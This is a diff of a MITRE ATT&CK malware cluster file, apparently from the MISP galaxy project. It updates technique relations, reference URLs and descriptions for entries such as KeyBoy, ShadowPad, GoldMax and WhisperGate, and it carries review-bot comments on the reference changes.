"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -46938,6 +49730,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -47523,13 +50322,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
@@ -47558,6 +50350,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -47690,13 +50489,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
@@ -48471,6 +51263,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -49390,13 +52189,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -49936,13 +52728,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -50028,6 +52813,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -50513,8 +53305,8 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
- "https://attack.mitre.org/software/S0672"
+ "https://attack.mitre.org/software/S0672",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
],
"synonyms": [
"Zox",
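Review bot: replacing `http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf` with a dated Wayback snapshot (`20230115144216`) implies the original no longer resolves, and the snapshot is the right fallback, but the original URL was also the citation's canonical identifier. Consider keeping both entries in `refs` (the sorted array accommodates it) so the primary source stays identifiable if the archived copy is ever removed. The array re-sort is also why `https://attack.mitre.org/software/S0672` moves to the first position and the hunk shows two changed lines instead of one.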
@@ -51005,6 +53797,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -51061,13 +53860,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
"tags": [
@@ -51082,6 +53874,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -51347,14 +54146,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -51750,13 +54549,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "518bb5f1-91f4-4ff2-b09d-5a94e1ebe95f",
@@ -52545,13 +55337,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -52792,6 +55577,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -52971,13 +55763,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "43155329-3edf-47a6-9a14-7dac899b01e4",
@@ -54017,6 +56802,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -54253,13 +57045,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "b45747dc-87ca-4597-a245-7e16a61bc491",
@@ -55948,13 +58733,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -57349,13 +60127,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -57404,13 +60175,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "d906e6f7-434c-44c0-b51a-ed50af8f7945",
@@ -58106,7 +60870,8 @@
"meta": {
"external_id": "S0663",
"mitre_platforms": [
- "Windows"
+ "Windows",
+ "Linux"
],
"refs": [
"https://attack.mitre.org/software/S0663",
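Review bot: the `mitre_platforms` list for S0663 gains `"Linux"` beside `"Windows"`, but this hunk shows no matching change to the entry's description or refs, so nothing in the file explains the new platform. Confirm the upstream ATT&CK STIX object for S0663 lists Linux; the adjacent hunks for this entry (old ranges -58134 through -58197) add a large batch of new `uses` relations, which points to a regeneration rather than a hand edit, in which case this is fine as is.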
@@ -58134,6 +60899,48 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
"tags": [
@@ -58141,6 +60948,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
"tags": [
@@ -58148,6 +60969,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"tags": [
@@ -58162,6 +60997,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
"tags": [
@@ -58169,6 +61011,27 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -58197,6 +61060,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
"tags": [
@@ -58259,6 +61129,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -58441,6 +61318,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -58649,13 +61533,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -58664,14 +61541,14 @@
"type": "uses"
},
{
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -58705,13 +61582,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
"tags": [
@@ -58760,6 +61630,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "215d9700-5881-48b8-8265-6449dbb7195d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
"tags": [
@@ -58823,13 +61700,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -59407,6 +62277,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -59448,13 +62325,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "1492d0f8-7e14-4af3-9239-bc3fe10d3407",
@@ -59622,13 +62492,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"tags": [
@@ -59911,7 +62774,7 @@
"https://attack.mitre.org/software/S0387",
"https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
"https://citizenlab.ca/2016/11/parliament-keyboy/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
+ "https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html"
],
"synonyms": [
"KeyBoy"
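Review bot: the replacement ref for KeyBoy is not a snapshot of the URL it replaces: the removed path is `/issues/cyber-security-data-privacy/research/...` while the archived one is `/issues/cyber-security-services/research/...`. If no Wayback snapshot of the original path exists, say so in the commit message or keep the original URL alongside the archive link so the citation stays traceable; the Remcos hunk later in this diff archives the identical path, which is the cleaner pattern.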
@@ -60085,13 +62948,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -60119,7 +62975,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0388",
- "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf"
+ "https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf"
],
"synonyms": [
"YAHOYAH"
@@ -62915,14 +65771,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -63081,6 +65937,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
"tags": [
@@ -63130,13 +65993,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
"tags": [
@@ -63165,6 +66021,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -65087,6 +67950,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -65900,6 +68770,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -67126,7 +70003,7 @@
"value": "BusyGasper - S0655"
},
{
- "description": "[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)",
+ "description": "[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)",
"meta": {
"external_id": "S0565",
"mitre_platforms": [
@@ -67848,6 +70725,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -68908,7 +71792,7 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -69201,10 +72085,10 @@
],
"refs": [
"https://attack.mitre.org/software/S0596",
- "https://content.fireeye.com/apt-41/rpt-apt41",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf",
- "https://securelist.com/shadowpad-in-corporate-networks/81432/"
+ "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf"
],
"synonyms": [
"ShadowPad",
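Review bot: the ShadowPad refs drop `https://content.fireeye.com/apt-41/rpt-apt41` and add `https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf`, a different host and filename rather than an archive of the removed URL. Confirm this is the relocated copy of the same APT41 report, since the description's citation keys are outside this hunk and cannot be checked against the new URL. The re-sorted list, with the trailing comma moved onto the securelist entry, is correct.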
@@ -69212,6 +72096,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -69641,7 +72532,7 @@
"value": "Penquin - S0587"
},
{
- "description": "[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)",
+ "description": "[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)",
"meta": {
"external_id": "S0597",
"mitre_platforms": [
@@ -69800,7 +72691,7 @@
"value": "Waterbear - S0579"
},
{
- "description": "[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)",
+ "description": "[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)",
"meta": {
"external_id": "S0588",
"mitre_platforms": [
@@ -69943,7 +72834,7 @@
"value": "GoldMax - S0588"
},
{
- "description": "[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)",
+ "description": "[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 2021)",
"meta": {
"external_id": "S0589",
"mitre_platforms": [
@@ -69972,6 +72863,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
"tags": [
@@ -70036,14 +72934,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -70242,6 +73140,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -70680,6 +73585,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -70882,13 +73794,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -70910,6 +73815,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -71681,7 +74593,7 @@
"value": "Meteor - S0688"
},
{
- "description": "[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)",
+ "description": "[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)",
"meta": {
"external_id": "S0689",
"mitre_platforms": [
@@ -71761,6 +74673,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
"tags": [
@@ -72024,5 +74943,5 @@
"value": "HermeticWizard - S0698"
}
],
- "version": 28
+ "version": 29
}
diff --git a/clusters/mitre-tool.json b/clusters/mitre-tool.json
index bd8c675..964aa97 100644
--- a/clusters/mitre-tool.json
+++ b/clusters/mitre-tool.json
@@ -37,6 +37,262 @@
"uuid": "242f3da3-4425-4d11-8f5c-b842886da966",
"value": "Windows Credential Editor - S0005"
},
+ {
